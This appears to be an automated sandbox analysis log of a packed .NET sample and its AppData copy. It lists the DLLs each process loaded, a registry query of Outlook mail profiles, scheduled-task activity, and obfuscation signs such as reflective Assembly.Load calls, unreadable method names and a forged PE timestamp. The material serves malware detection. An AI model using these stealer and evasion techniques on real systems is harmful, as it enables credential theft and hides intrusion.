                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: PvAmrCZENy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PvAmrCZENy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PvAmrCZENy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: nqHL.pdb source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr
                Source: Binary string: nqHL.pdbSHA256T source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr

                Data Obfuscation

                barindex
                Source: PvAmrCZENy.exe, Form3.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: yxXYABHh.exe.0.dr, Form3.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.75c0000.6.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.421b370.5.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.423b390.3.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])
                Source: PvAmrCZENy.exeStatic PE information: 0xB587A68D [Mon Jul 5 14:34:53 2066 UTC]
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_02FFEF88 push eax; iretd 0_2_02FFEF89
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244891E pushad ; iretd 7_2_0244891F
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_02448C2F pushfd ; iretd 7_2_02448C30
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_02448DDF push esp; iretd 7_2_02448DE0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06402DBE pushfd ; retf 7_2_06402DC1
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_00B9EF88 push eax; iretd 8_2_00B9EF89
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A0C308 push esp; retf 8_2_06A0C309
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A0C342 push 84026ACBh; retf 8_2_06A0C349
                Source: PvAmrCZENy.exeStatic PE information: section name: .text entropy: 7.743655537564809
                Source: yxXYABHh.exe.0.drStatic PE information: section name: .text entropy: 7.743655537564809
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, mS6gZkYdVOZrKGG8hX.csHigh entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, u07XDpgHpxVYHUppXV.csHigh entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.csHigh entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, F6ARVpzaNnUQdyao3j.csHigh entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.csHigh entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, kPeThipR6kgr26coax.csHigh entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, dpeYSjP1UMv2qXuK2B.csHigh entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, q5clipqBHqOnkVSmJl.csHigh entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, oXOgna9aQgAHxFpovw.csHigh entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, gUKDmLQMndPSRA3HBN.csHigh entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, fNvmGLe0G2dhMMIpXW.csHigh entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, IabwK0xQXmYgZNDWfQ.csHigh entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, PTqIT3WJvtWp0iNXPt.csHigh entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, x3lxZTDkOsca9FiTet.csHigh entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, P1YV7U870rVYc4tCci.csHigh entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
